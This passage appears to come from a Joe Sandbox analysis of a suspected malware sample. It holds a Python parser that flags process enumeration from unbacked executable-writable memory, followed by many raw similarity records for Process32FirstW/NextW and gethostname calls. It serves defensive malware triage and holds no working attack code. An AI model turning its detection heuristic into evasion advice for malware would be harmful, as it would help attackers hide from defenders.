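    r"(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<snap>\d+)\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<protect>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\.(?P<type>[0-9A-F]{8})"
    r"\.[0-9A-F]{8}\.sdmp", re.I)
API_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)", re.I)

# Constructed sample: three records from this page, trimmed to the lines used here.
SAMPLE = """\
APIs
• Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
Memory Dump Source
• Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
• API ID: NextProcess32
• Opcode ID: 90ebbf402c6acd85aa4d690adefeade6ac271f31286d7dc5e90c8f38f7975533
• Instruction Fuzzy Hash: 3751A7FB1AC129BD719AA1855F54AF6676EE3CB730B328426F803D6682E3C44F4D1871
APIs
• Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
Memory Dump Source
• Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
• API ID: FirstProcess32
• Opcode ID: 8c3a7c87d53bd52bfe9204ca6661e43979af6813112457d53aae01b128907f4d
• Instruction Fuzzy Hash: 3651C3E726D321BD720A95811B649FB6B7EE5DF770B32803AB403D65C2E7840A499171
Memory Dump Source
• Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
• API ID:
• Opcode ID: 3da7ebb15e270a271eb91999b41257f636c70d35c1758feab1f142ac8dc2bc08
• Instruction Fuzzy Hash: A451E5FB1AC129BD719BA1415F54AF6672EE7CB330B32802AB803D6682E3C54F4D5871
"""


def parse_records(text):
    """Walk the report line by line; a record closes at its 'Instruction Fuzzy Hash' line."""
    records, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_RE.fullmatch(line)
        if m:                                   # "Process32NextW.KERNEL32(...), ref: 0718040C"
            cur["apis"].append({**m.groupdict(), "ref": int(m["ref"], 16)})
        elif line.startswith("Source File:"):
            name, _, rest = line[len("Source File:"):].partition(",")
            s = SDMP_RE.fullmatch(name.strip())
            cur["dump"] = None if s is None else {
                "pid": int(s["pid"], 16), "snapshot": int(s["snap"]),
                "base": int(s["base"], 16), "protect": int(s["protect"], 16),
                "state": int(s["state"], 16), "type": int(s["type"], 16)}
            cur["based_on_pe"] = "based on PE: true" in rest
        elif line.startswith("Opcode ID:"):
            cur["opcode_id"] = line.split(":", 1)[1].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur["instr_fuzzy"] = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = {"apis": []}
    return records


def summarize(records):
    """Per dump region: distinct functions (by Opcode ID), APIs referenced, memory attributes."""
    regions = defaultdict(lambda: {"opcode_ids": set(), "apis": set(),
                                   "unbacked": False, "rwx_private": False})
    for r in records:
        d = r.get("dump")
        if d is None:
            continue
        reg = regions[d["base"]]
        reg["opcode_ids"].add(r["opcode_id"])
        reg["apis"].update(a["api"] for a in r["apis"])
        reg["unbacked"] = reg["unbacked"] or not r["based_on_pe"]
        reg["rwx_private"] = (d["protect"] == PAGE_EXECUTE_READWRITE and d["type"] == MEM_PRIVATE)
    return {base: dict(v) for base, v in regions.items()}


def process_enum_from_unbacked_rwx(summary):
    """Bases of unbacked, private RWX regions whose functions call Toolhelp process enumeration."""
    return sorted(base for base, reg in summary.items()
                  if reg["unbacked"] and reg["rwx_private"] and reg["apis"] & TOOLHELP)


if __name__ == "__main__":
    summ = summarize(parse_records(SAMPLE))
    for base, reg in sorted(summ.items()):
        print(f"{base:#010x}: {len(reg['opcode_ids'])} functions, APIs={sorted(reg['apis'])}, "
              f"unbacked={reg['unbacked']}, rwx_private={reg['rwx_private']}")
    print("process enumeration from unbacked RWX:",
          [hex(b) for b in process_enum_from_unbacked_rwx(summ)])
```

Run it over a full report export (paste the section into SAMPLE or read it from a file) to collapse the many near-identical records into one line per dump region; the Opcode ID set is what separates genuinely distinct functions from the fuzzy-hash neighbours the plugin lists separately. The flag is deliberately narrow: it fires only when process enumeration is reached from memory that has no PE backing and is both executable and writable, which matches the unpacked-stage regions seen in this report rather than ordinary module code.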
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 6d9ff12c92c74f0d7279a2c62a82e135869223ddfdeb6f7bb99477f0e8f2233f
                                                              • Instruction ID: 4a7b946aa0710eb2aa0b036d52ca43eef645e28c0f76fcaec66855b02d058668
                                                              • Opcode Fuzzy Hash: 6d9ff12c92c74f0d7279a2c62a82e135869223ddfdeb6f7bb99477f0e8f2233f
                                                              • Instruction Fuzzy Hash: 1D51D7FB1AC129BD719AA1415F54AF6662EE3CB330B328426B807D66C2F3C44F4D1871
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: baf6a1904a74e1fe737e39c18ad9cb6c8393546aa80eea086626b62ecdb35aee
                                                              • Instruction ID: 66d6f0502793d1cc992e739229b105921360d9275f003832a5b409675168c0fe
                                                              • Opcode Fuzzy Hash: baf6a1904a74e1fe737e39c18ad9cb6c8393546aa80eea086626b62ecdb35aee
                                                              • Instruction Fuzzy Hash: 0A51E5FB1AC129BD719AA1455F54AF6672EE7CB330B328426B807D66C2E3C44B4D1871
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 8816f8acc4cca7782550071a1ecfb457d04906521c070d2397eac87b6d8a1b5d
                                                              • Instruction ID: 5c70227dcda3af5b5f96614e950971cd7c22058c9ee608e192a0bf6f05930f36
                                                              • Opcode Fuzzy Hash: 8816f8acc4cca7782550071a1ecfb457d04906521c070d2397eac87b6d8a1b5d
                                                              • Instruction Fuzzy Hash: E251C6E726D321BD720A95815B649FB6A7EE6CF730F32843AB403D66C2E3C40E499171
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 8db2e3b7c82e042870164fe9f8e7866623207c52ec21b66bf23c09cb3d93c666
                                                              • Instruction ID: ba3f50146b917e849b6b618230585665f8d0bcb5921c45eb2c8133d3f6813064
                                                              • Opcode Fuzzy Hash: 8db2e3b7c82e042870164fe9f8e7866623207c52ec21b66bf23c09cb3d93c666
                                                              • Instruction Fuzzy Hash: 7451D6F726D321BD720A95815B659FB6A7EE5CF730B32803AB803D66C2E3C40E499171
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fbd824b57b30591d6fd3a6181022223fcccea5ee6736ac902b64d97e762fc70
                                                              • Instruction ID: afd3eff8dfe72c949a1e89efceccc286a0332b3aca5ebd84ea9a8ca361d7a47a
                                                              • Opcode Fuzzy Hash: 2fbd824b57b30591d6fd3a6181022223fcccea5ee6736ac902b64d97e762fc70
                                                              • Instruction Fuzzy Hash: D051E5FB1AC129BD719BA1855B54AF6672EE7CB730B328426B803D66C2E3C44F4D1871
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: c180f121446ad358d8dc5049b4aa98c8cb25557399d829cff32928623c46db68
                                                              • Instruction ID: 9d82e8658464e499b5b94a7a9e28de6a6b64eb1306943aa18909705056c9d116
                                                              • Opcode Fuzzy Hash: c180f121446ad358d8dc5049b4aa98c8cb25557399d829cff32928623c46db68
                                                              • Instruction Fuzzy Hash: 4D51D5FB1AC129BD719AA1855B54AF6662EE7CF330B328426B803D66C2E3C44F4D1871
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: d3f2ab33e14112f8d181f67ef17e5f418c3b3e81fba475adf923497ce90dfca4
                                                              • Instruction ID: 99f531e81de40793988c2be4ebb1ec0736d5f1a23de457a58e0be30d4ec38e27
                                                              • Opcode Fuzzy Hash: d3f2ab33e14112f8d181f67ef17e5f418c3b3e81fba475adf923497ce90dfca4
                                                              • Instruction Fuzzy Hash: 2941A2FB26D321BE720A95811B649FB677EE5CB770B32843AF803D6582E3C44E499171
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: b1663f456cfbbc6ddec9bb18cf54cf405b86a71380be597206fff18bdece15a2
                                                              • Instruction ID: 9a70c1da4cd5ccab11b4454dd586f7b9544c77da1d4a058f658528ca0ad99801
                                                              • Opcode Fuzzy Hash: b1663f456cfbbc6ddec9bb18cf54cf405b86a71380be597206fff18bdece15a2
                                                              • Instruction Fuzzy Hash: 2241A1FB26D321BD720A95412B649FB6A7EE5CB770B32853AF803D65C2E3C40E499171
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e97d33ce62f7a8715804478b32a8fe3a4415be346511b7ac93ce807d2e7a6a4d
                                                              • Instruction ID: fbdafddbb063464aa68597cdc9533b4508de4da314a5bb76153bcde23d0d9761
                                                              • Opcode Fuzzy Hash: e97d33ce62f7a8715804478b32a8fe3a4415be346511b7ac93ce807d2e7a6a4d
                                                              • Instruction Fuzzy Hash: 0441D4FB1AC129BD719BA1455B54AF6662EE7CB330B328426B807D66C2E3C44F4D1871
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 443bfc3f0e0a8101c6dbbbfa594b8e76fdb70585bbbb4daf906fe57126d0e1c3
                                                              • Instruction ID: a3e019c8f71e3fb8f8576b85b050ee9e6f8f6e4aee66b6f8992aaaaf1490b34b
                                                              • Opcode Fuzzy Hash: 443bfc3f0e0a8101c6dbbbfa594b8e76fdb70585bbbb4daf906fe57126d0e1c3
                                                              • Instruction Fuzzy Hash: 2A41B5FB1AC129BD719BA1855B54AF6662FE7CB330B328426B803D66C2E3C44F4D1871
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 0a896d7f93a86a2c78dc23a8702d6ad54a5ecf4063e7d6824baa58edd54d294f
                                                              • Instruction ID: 6cb0d3ba2691ba07b2d34168cfb17158d5de17453d0c268117fb2f1a5a9a5d5e
                                                              • Opcode Fuzzy Hash: 0a896d7f93a86a2c78dc23a8702d6ad54a5ecf4063e7d6824baa58edd54d294f
                                                              • Instruction Fuzzy Hash: 9F41B2FB1AC129BD719BA1455F54AF6662EE7CB330B328426B807D66C2E3C44F4D1871
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 7bf43257381836fea34c9ada6cdc9a0caf031c83cfbf4ab6401441f29c81ebc7
                                                              • Instruction ID: 020d616f81a3301e6308c3931a08ee535aa76233b991317c4b5141126c161a36
                                                              • Opcode Fuzzy Hash: 7bf43257381836fea34c9ada6cdc9a0caf031c83cfbf4ab6401441f29c81ebc7
                                                              • Instruction Fuzzy Hash: B241E6FB2AD119BDB19AA1415F54AF7672FE7CB330B328026B803D66C2E3C40A4D5871
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: f6b7e635e7897a50717a6e28f3f99158f8cf945fd68c58fd89985841f6a8027e
                                                              • Instruction ID: 4c85fc6885f0e7aa71365a9425a06af4c6855a55814f1b4ce936c50bbe3a70e2
                                                              • Opcode Fuzzy Hash: f6b7e635e7897a50717a6e28f3f99158f8cf945fd68c58fd89985841f6a8027e
                                                              • Instruction Fuzzy Hash: BC41B1EB26D321BD720A95811B649FB6A7EE5CB770B72813AB803D65C2E3C40E499171
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: df667d58f4cc7174e752264305fc17019a4428643ef372edcb87040fb2699535
                                                              • Instruction ID: dbcb293054a1e211508a002ede72d308689eb61929e84956e92f6b69a44cf0a2
                                                              • Opcode Fuzzy Hash: df667d58f4cc7174e752264305fc17019a4428643ef372edcb87040fb2699535
                                                              • Instruction Fuzzy Hash: B141E3F726C321BE720A95811B659FB6A7EE5CB370B32813AF403D6682F3D40E499171
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 2ae4bcd7dd633c23bbbec349495778682825960ac04587c1ba34170699e01bfa
                                                              • Instruction ID: 4b1a1f77daf70cd0321ede10ccc9b88c8761325084a0dc73fe6b04ed0f8a638e
                                                              • Opcode Fuzzy Hash: 2ae4bcd7dd633c23bbbec349495778682825960ac04587c1ba34170699e01bfa
                                                              • Instruction Fuzzy Hash: 7841F3F726D321BD720A91811B649FBAA7EE5CB770B72813AF403D66C2F3C44A499171
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 384b30fd8b0712d73358fcb1ecb5dc2e9406929a1bf7667bcf5896ed690ad0f5
                                                              • Instruction ID: a75b80b96cd9cb908f1c4b41d549d6beed8df5ea816a0e956a56feabdf87afd5
                                                              • Opcode Fuzzy Hash: 384b30fd8b0712d73358fcb1ecb5dc2e9406929a1bf7667bcf5896ed690ad0f5
                                                              • Instruction Fuzzy Hash: BC41D3F726D321BD720A95811B659FA6A7EE5CF370B72813AB803D65C2F3C40E499171
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: e2b26587daa9341169c10370702b67349df68046b43eaca52c674a50124e5f61
                                                              • Instruction ID: f7d37109b35df9879a2073420b97ca0a88a9f5a48b2ed318195b03c624baf8fa
                                                              • Opcode Fuzzy Hash: e2b26587daa9341169c10370702b67349df68046b43eaca52c674a50124e5f61
                                                              • Instruction Fuzzy Hash: D541F3F726D321BE720A95415B649FA7A7EE5CB370B32813AF803D65C2F3D40A499171
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 12f0484d0a5f0571ac0c59672eb1f128a27dd019bc4e8b8ea77e199fbcdd848d
                                                              • Instruction ID: 900c2da6adf7570b6da8033409ba5599468b9786e76fb26390f30cb3102233d8
                                                              • Opcode Fuzzy Hash: 12f0484d0a5f0571ac0c59672eb1f128a27dd019bc4e8b8ea77e199fbcdd848d
                                                              • Instruction Fuzzy Hash: 1141E6FB2AD119BDB19BA1415F54AF66B2EE7CF630B314026F803D65C2E3C44A4E5871
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: b785e4ec19e32d4bd101bae6523dbff6ae6b785ecff52696753f00689e24bf9e
                                                              • Instruction ID: f03fafe1b1df397f5a9aa1ffacf8bd557f7c2e287e137032f34195e28f9b8bfb
                                                              • Opcode Fuzzy Hash: b785e4ec19e32d4bd101bae6523dbff6ae6b785ecff52696753f00689e24bf9e
                                                              • Instruction Fuzzy Hash: 8441A7FB2AC129BDB1DAA1415B549F6666EE7DB330F328436B803D66C2E3C40B4D5871
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 530f9838640e084a00132f441f189f4592d77f4003e33dff5b3e90419f252c2c
                                                              • Instruction ID: 83adb27c27da082e41d8f155a2946a1d8302a0c34785997fbd07d1e74de7ecfe
                                                              • Opcode Fuzzy Hash: 530f9838640e084a00132f441f189f4592d77f4003e33dff5b3e90419f252c2c
                                                              • Instruction Fuzzy Hash: A141DFF726C321BD720A95811B659F66A7EE5CF370B72813AB803D66C2F3C44A4991B1
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: 039ae2bbdb75d59998a7d8273b5a545a6b4cb08e0e7ecbc7954e1308e6cee939
                                                              • Instruction ID: 3d90e3d7141c5bb1ece6e9074b26b067200ac8b4ff06adc94b97cbee389d774b
                                                              • Opcode Fuzzy Hash: 039ae2bbdb75d59998a7d8273b5a545a6b4cb08e0e7ecbc7954e1308e6cee939
                                                              • Instruction Fuzzy Hash: 523195FB2AD129BD71DBA1415B549F6662EE7CB330F328426B807D6AC2E3C40A4D1871
                                                              APIs
                                                              • Process32FirstW.KERNEL32(?,?,?,?), ref: 071703FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799896809.0000000007170000.00000040.00001000.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7170000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: FirstProcess32
                                                              • String ID:
                                                              • API String ID: 2623510744-0
                                                              • Opcode ID: 70bbd7eb39dee4ceaebe0d622edd1e113010ad998f687dc3607dc1e254018722
                                                              • Instruction ID: 8d8efec3e1faf0483d49ff5d330d2e32b231f95e1180152ed0f1d01ba5b26026
                                                              • Opcode Fuzzy Hash: 70bbd7eb39dee4ceaebe0d622edd1e113010ad998f687dc3607dc1e254018722
                                                              • Instruction Fuzzy Hash: 4831D2F726C321BD720A95815B658F66A7EE5CF370B72813AB403D66C2F7C04A49D1B1
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: d48e780fba92e7a73a19b897a620c7e1cb08437e964298b012b793e9fa65003d
                                                              • Instruction ID: edfc561ae618b684001058b120dbcbbbee1bc0f0b932aeb057704cb8aea09d84
                                                              • Opcode Fuzzy Hash: d48e780fba92e7a73a19b897a620c7e1cb08437e964298b012b793e9fa65003d
                                                              • Instruction Fuzzy Hash: F731F7F729D119BE728BA1459F549FA672EE7CF230B35402AF803D65C2E3C40A4D5932
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7180000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: NextProcess32
                                                              • String ID:
                                                              • API String ID: 1850201408-0
                                                              • Opcode ID: af096c1b06efaa5469f3b4f9799a511c9e10c88dcb8e49522e61734e3a8ff3c4
                                                              • Instruction ID: 30bed38719fa880bb16bc41f42c84db9894a9096d2e17264d46a91875a54e0c1
                                                              • Opcode Fuzzy Hash: af096c1b06efaa5469f3b4f9799a511c9e10c88dcb8e49522e61734e3a8ff3c4
                                                              • Instruction Fuzzy Hash: 5F31A6FB2AD129BD719BA1455B549F6662EE7CB330F328026B803D66C2E3C40E4D1871
                                                              APIs
                                                              • gethostname.WS2_32(00000000,00000040), ref: 00F44AA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: gethostname
                                                              • String ID:
                                                              • API String ID: 144339138-0
                                                              • Opcode ID: 81ce2f86eb180d155036c76fd61a51c8c4260e9d18435a615c212937d039b22f
                                                              • Instruction ID: 6296f9123508bab70d0052bdbb431c2830a94942048a083eac4992694f54963c
                                                              • Opcode Fuzzy Hash: 81ce2f86eb180d155036c76fd61a51c8c4260e9d18435a615c212937d039b22f
                                                              • Instruction Fuzzy Hash: 7B518F71A047008BE7309E25DD497237AE4EF81329F14093DED8AA66D1E779F884FB12
                                                              APIs
                                                              • Process32NextW.KERNEL32(-00000052,?,?,?), ref: 0718040C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1799911429.0000000007180000.00000040.00001000.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                              Joe Sandbox IDA Plugin
